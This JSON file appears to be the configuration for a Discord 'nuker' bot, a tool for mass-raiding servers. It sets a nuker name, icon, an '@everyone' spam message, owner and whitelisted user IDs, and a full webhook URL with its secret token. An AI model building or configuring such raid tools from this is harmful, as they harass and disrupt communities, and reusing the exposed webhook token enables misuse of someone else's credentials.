{
  "PREFIX": "+",
  "UserID": "673402992740925470",
  "OwnerID": "673402992740925470",
  "WlUser":["945622464698941470"],
  "AFK": "FALSE",
  "ACCESS" : "2" ,
  "NUKERNAME" : "KINGU",
  "NUKEICON" : "https://images-ext-2.discordapp.net/external/tD5i_RbZT_41Ztp-j1da-QdudUp_VYufMfAQHBBTffg/https/media.discordapp.net/attachments/924312501863206914/924889265182224394/TM_D_I_N_O.png",
  "NUKEBANNER" : "https://images-ext-2.discordapp.net/external/tD5i_RbZT_41Ztp-j1da-QdudUp_VYufMfAQHBBTffg/https/media.discordapp.net/attachments/924312501863206914/924889265182224394/TM_D_I_N_O.png",
  "NUKECHANNELNAME" : "",
  "NUKEMESSAGE" : "@everyone",
  "PreG" : ["979599189950476349"],
  "WARNINGS" : "TRUE",
  "SAVEWEB":"https://discord.com/api/webhooks/988755808722493440/pJ5CxMECov3buV2sRxIs_oMLNg1aCgr_XAZhfLrhl7NofY3OGZbnru-jSHurFuCqbL1K",

"EMOJIES": ["❤","🧡","💛","💚","💙","💜","🤎","🖤","🤍","💔","💓","💗","💖","💘","💝"],
  "VOLUME" : "3",
  "MSGLOG" : "OFF"
}
